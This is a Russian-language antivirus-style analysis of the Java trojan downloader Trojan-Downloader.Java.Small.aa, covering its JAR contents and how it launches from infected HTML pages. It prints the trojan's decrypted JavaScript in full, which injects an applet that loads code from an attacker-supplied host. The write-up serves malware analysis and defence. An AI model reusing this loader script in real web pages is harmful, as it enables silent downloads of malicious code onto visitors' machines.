Security Lab

Trojan-Downloader.Java.Small.aa

Trojan-Downloader.Java.Small.aa

Троянская программа, загружающая файлы из сети Интернет без ведома пользователя.

Технические детали

Троянская программа, загружающая файлы из сети Интернет без ведома пользователя. Является JAR-архивом, содержащим набор Java-классов (class-файлы). Имеет размер 3556 байт.

Деструктивная активность

Вредоносный JAR-архив содержит следующий набор файлов:

Meta-inf\Manifest.mf (25 байт)
applet.class (5482 байта)
util.class (407 байт)

Основной функционал вредоноса реализован в классе "applet". Вредонос является Java-апплетом и запускается с зараженной HTML-страницы при помощи тега "<APPLET>". Вредоносный апплет запускается с двумя параметрами:

id
uid

Троянец содержит в своем теле в зашифрованном виде скрипт языка JavaScript. После запуска троянец расшифровывает данный скрипт и запускает его при помощи функции:

getAppletContext().showDocument

Расшифрованный скрипт имеет следующий вид:

javascript:function fudBfudW()
{      
try
{              
var antgantd=document.createElement('applet');         
antgantd.setAttribute('codebase', 'file:C:\\Program Files\\
Java\\jre6\\lib\\ext');        
antgantd.setAttribute('code', 'http://<значение параметра
"id">/options');               
buyvbuyc=document.createElement('param');              
buyvbuyc.setAttribute('name', 'uid');          
buyvbuyc.setAttribute('value', '<значение параметра " uid">');         
antgantd.appendChild(buyvbuyc);        
document.body.appendChild(antgantd);   
}
catch(e)
{              
document.write('');              
setTimeout(fudBfudW, 1000);    
};
};
fudBfudW();

Таким образом, запуск скрипта приводит к запуску Java-апплета, class-файл которого расположен по адресу:
http://<значение параметра "id">/options

Апплет будет запущен с параметром "uid", значение которого равно переданному вредоносному апплету параметру "uid".

Alert! Зафиксирована утечка экспертных знаний!

Собираем и анализируем опыт профессионалов ИБ

Подключитесь к потоку конфиденциальной информации!